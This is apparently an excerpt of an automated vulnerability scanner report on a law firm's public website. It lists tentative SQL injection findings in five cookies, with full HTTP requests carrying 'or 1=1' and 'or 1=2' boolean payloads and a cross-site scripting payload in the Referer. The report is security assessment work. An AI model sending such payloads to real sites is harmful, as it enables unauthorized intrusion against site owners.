1.36. http://www.pillsburylaw.com/a [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 14571208'%20or%201%3d1--%20 and 14571208'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/614571208'%20or%201%3d1--%20; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Thu, 13-May-2010 00:34:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/614571208'%20or%201%3d2--%20; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.37. http://www.pillsburylaw.com/a [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 15918602'%20or%201%3d1--%20 and 15918602'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4615918602'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Thu, 13-May-2010 00:35:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4615918602'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.38. http://www.pillsburylaw.com/a [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 20857946'%20or%201%3d1--%20 and 20857946'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A2520857946'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Thu, 13-May-2010 00:34:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A2520857946'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.39. http://www.pillsburylaw.com/a [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 15919628'%20or%201%3d1--%20 and 15919628'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee515919628'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Thu, 13-May-2010 00:34:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee515919628'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.40. http://www.pillsburylaw.com/a [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 17968108'%20or%201%3d1--%20 and 17968108'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee517968108'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Thu, 13-May-2010 00:35:09 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee517968108'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
